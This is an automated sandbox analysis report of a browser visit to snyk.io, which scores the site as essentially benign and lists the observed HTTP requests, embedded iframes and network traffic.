Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://snyk.io

Overview

General Information

Sample URL:http://snyk.io
Analysis ID:1541477
Infos:

Detection

Score:1
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 2132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,10802499006494402137,4490958038480893554,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://snyk.io" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://snyk.io/HTTP Parser: Base64 decoded: 1:crn:contentful:::content:spaces/oyrbri43adzz/environments/master/entries/4Cvs5O3aQ6vys9uwaIP3nv
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://app.usercentrics.eu/browser-sdk/4.38.4/cross-domain-bridge.html
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://go.snyk.io/index.php/form/XDFrame
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://app.usercentrics.eu/browser-sdk/4.38.4/cross-domain-bridge.html
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://go.snyk.io/index.php/form/XDFrame
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-X9SH3KP7B4&gacid=1178466141.1729799377&gtm=45je4al0v879460793za200zb9131853231&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101686685~101794737~101823848&z=1699791070
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://app.usercentrics.eu/browser-sdk/4.38.4/cross-domain-bridge.html
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://go.snyk.io/index.php/form/XDFrame
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-X9SH3KP7B4&gacid=1178466141.1729799377&gtm=45je4al0v879460793za200zb9131853231&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101686685~101794737~101823848&z=1699791070
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://app.usercentrics.eu/browser-sdk/4.38.4/cross-domain-bridge.html
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://go.snyk.io/index.php/form/XDFrame
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-X9SH3KP7B4&gacid=1178466141.1729799377&gtm=45je4al0v879460793za200zb9131853231&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101686685~101794737~101823848&z=1699791070
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/923832244?random=1729799399572&cv=11&fst=1729799399572&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4al0v9101588801z89131853231za201zb9131853231&gcd=13r3r3r3r5l1&dma=0&tag_exp=101533422~101686685~101794737~101823847&u_w=1280&u_h=1024&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&hn=www.googleadservices.com&frm=0&tiba=See%20Snyk%20in%20action%20-%20Book%20a%20live%20demo%20%7C%20Snyk&did=dOThhZD&gdid=dOThhZD&npa=0&us_privacy=1YNY&pscdl=noapi&auid=1154500146.1729799382&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1729799362127
Source: https://snyk.io/schedule-a-demo/HTTP Parser: Iframe src: https://js.driftt.com/core?d=1&embedId=4479srg8vkz5&eId=4479srg8vkz5&region=US&forceShow=false&skipCampaigns=false&sessionId=33b92b4a-3857-4f99-b6b5-ba8f4819d7b3&sessionStarted=1729799400.741&campaignRefreshToken=6e028e55-17c7-4347-8e64-68f1dad2ce32&hideController=false&pageLoadStartTime=1729799362127&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F
Source: https://snyk.io/HTTP Parser: No favicon
Source: https://snyk.io/HTTP Parser: No favicon
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No favicon
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No favicon
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No favicon
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No favicon
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No favicon
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No favicon
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No favicon
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No <meta name="author".. found
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No <meta name="author".. found
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No <meta name="author".. found
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No <meta name="author".. found
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No <meta name="copyright".. found
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No <meta name="copyright".. found
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No <meta name="copyright".. found
Source: https://snyk.io/schedule-a-demo/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:50219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:50329 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.5:50221 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: snyk.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/26b648d8446363b8.css HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&w=960&q=75 HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&w=960&q=75 HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1723050301%2Fwebsite-heroes%2Fbackground-images%2Fhero-homepage-2024.jpg&w=2560&q=75 HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8315.747656db2e96420a.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8796.579c4548d83cb2ef.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9875.8b3ce8ccbc1ad2ec.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8315.747656db2e96420a.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1723050301%2Fwebsite-heroes%2Fbackground-images%2Fhero-homepage-2024.jpg&w=2560&q=75 HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&w=960&q=75 HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2614.3ec078ba5dda1b72.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2165.946eebc4630896bc.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1751.f8f467cbaf47e698.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&w=960&q=75 HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8796.579c4548d83cb2ef.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5030.3b020cf8ffddffa3.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9875.8b3ce8ccbc1ad2ec.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2614.3ec078ba5dda1b72.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6936.f953d0b9b00df349.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5185.9a7562e082cb91f4.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3259-a3f17db6e69abe5a.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1751.f8f467cbaf47e698.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9384.57f0a60a33b0d128.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2165.946eebc4630896bc.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5662.de65dddd439a4870.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5030.3b020cf8ffddffa3.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6936.f953d0b9b00df349.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5185.9a7562e082cb91f4.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-1e81cdc3aa31d741.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3259-a3f17db6e69abe5a.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
